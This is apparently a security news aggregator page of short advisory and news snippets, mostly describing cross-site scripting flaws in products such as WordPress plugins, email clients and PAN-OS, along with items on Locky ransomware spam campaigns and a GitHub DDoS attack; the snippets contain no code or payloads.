DOM Cross-Site Scripting Vulnerability in UFIDA U8+ Financial System

UFIDA U8+ is a fine financial software. A stored cross-site scripting vulnerability exists in the UFIDA U8+ financial system. It allows an attacker to insert malicious js code into a page to obtain user cookies and other information, leading to user hijacking...

Suspicious Credential Harvesting

Compromised websites injected with malicious JavaScript, have been identified. Successful exploitation could result in remote code execution on the target system once the malicious page is loaded, leading to credential harvesting...

CVE-2017-3948

Cross Site Scripting XSS in IMG Tags in the ePO extension in McAfee Data Loss Prevention Endpoint DLP Endpoint 10.0.x allows authenticated users to inject arbitrary web script or HTML via injecting malicious JavaScript into a user's browsing session...

Phone Hack Uses Sensors To Steal PINs

University researchers have created a method to steal a smartphone user’s PIN by leveraging sensor data generated by the targeted phone. Researchers say the method has a 74 percent success rate when it comes to accurately determining four-digit PIN data inputted by a phone’s owner. Researchers fr...

WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting

WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting Source: https://sumofpwn.nl/advisory/2016/persistentcrosssitescriptinginthewordpressnewstatpressplugin.html Abstract A persistent Cross-Site Scripting XSS vulnerability has been found in the WordPress NewStatPress plugin. By using this...

U.S. Dept Of Defense: Remote File Inclusion, Malicious File Hosting, and Cross-site Scripting (XSS) in ████████

Details: There is currently a security misconfiguration on plain.php function located on the host http://██████████/ allowing attackers to include webserver contents of their choosing no restriction on filetypes and/or IP addresses, as well as embed malicious javascript payloads in the response v...

Spammers using Facebook Messenger to Spread Locky Ransomware

If you came across any Facebook Message with an image file exactly .SVG file format send by any of your Facebook friends, just avoid clicking it. An ongoing Facebook spam campaign is spreading malware downloader among Facebook users by taking advantage of innocent-looking SVG image file to infect...

WordPress Plugin WassUp Real Time Analytics 1.9 - Persistent Cross-Site Scripting

Source: https://sumofpwn.nl/advisory/2016/persistentcrosssitescriptinginwassuprealtimeanalyticswordpressplugin.html Persistent Cross-Site Scripting in WassUp Real Time Analytics WordPress Plugin Abstract A stored Cross-Site Scripting XSS vulnerability has been found in the WassUp Real Time...

XSS Vulnerability in NetEase Email Master Client PC Version

NetEase Mail Master client is a universal email client launched by NetEase 163. An XSS vulnerability exists in the PC version Ver2.4.1.8 of the NetEase Mail Master client. It allows attackers to insert malicious js code into the page to obtain user cookies and other information, leading to user...

WordPress Activity Log 2.3.1 Plugin - Persistent Cross-Site Scripting

Exploit for php platform in category web applications Persistent Cross-Site Scripting in WordPress Activity Log plugin Han Sahin Abstract A stored Cross-Site Scripting XSS vulnerability has been found in the WordPress Activity Log plugin. By using this vulnerability an attacker can inject malicio...

Adobe Analytics AppMeasurement for Flash Library Patch

Adobe today patched a vulnerability in the Adobe Analytics AppMeasurement for Flash library, which can be added to Flash projects to measure the usage of Flash-based content. The vulnerability is a DOM-based cross-site scripting flaw that can be abused for cookie theft, said researcher Randy...

Surge in Spam Campaign Delivering Locky Ransomware Downloaders

FireEye Labs is detecting a significant spike in Locky ransomware downloaders due to a pair of concurrent email spam campaigns impacting users in over 50 countries. Some of the top affected countries are depicted in Figure 1. Figure 1. Affected countries As seen in Figure 2, the steep spike start...

Surge in Spam Campaign Delivering Locky Ransomware Downloaders

FireEye Labs is detecting a significant spike in Locky ransomware downloaders due to a pair of concurrent email spam campaigns impacting users in over 50 countries. Some of the top affected countries are depicted in Figure 1. Figure 1. Affected countries As seen in Figure 2, the steep spike start...

Cross-Site Scripting Vulnerability in Dreammail Email Client

DreamMail is a professional e-mail client software for sending, receiving and managing e-mail. A cross-site scripting vulnerability exists in the Dreammail Ver 5.16.1003.1015 email client. It allows an attacker to insert malicious js code into a page to obtain user cookies and other information,...

ESM Console XSS vulnerability

A cross-site scripting vulnerability exists in the web-based console management. This vulnerability has been assigned CVE-2015-2223. This issue affects the management interface of Traps, where an authenticated administrator may be tricked into injecting malicious JavaScript into the web UI...

ESM Console XSS vulnerability

A cross-site scripting vulnerability exists in the web-based console management. This vulnerability has been assigned CVE-2015-2223. This issue affects the management interface of Traps, where an authenticated administrator may be tricked into injecting malicious JavaScript into the web UI...

Trello: DOM based XSS via Wistia embedding

Hi, You are using Wistia to embed video at trello.com. However external script from fast.wistia.com vulnerable to XSS and allows to run malicious javascript on your side. vulnerable code: fast.wistia.net/assets/external/E-v1.js I found that parameter wchannel can be controled to load js from...

Microsoft Edge XSS Filter Bypass (MS15-107: CVE-2015-6058)

An XSS filter bypass vulnerability exists in Microsoft Edge. A remote attacker could exploit this issue by convincing target users to view a web page containing malicious JavaScript code with an effected version of Microsoft Edge. Successful exploitation could allow an attacker to take any action...

Github Mitigates DDoS Attack

Code repository Github mitigated a distributed denial-of-service attack, restoring services this morning around 9 a.m. Eastern time. According to a Github status log, connectivity problems began today around 5:30 a.m. with Github declaring it was under a DDoS attack an hour later. A request for...

Palo Alto PAN-OS XSS Vulnerability (PAN-SA-2015-0003)

A cross-site scripting vulnerability exists in the web-based device management interface whereby data provided by the user is echoed back to the user without sanitization. Ref 73638 SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and...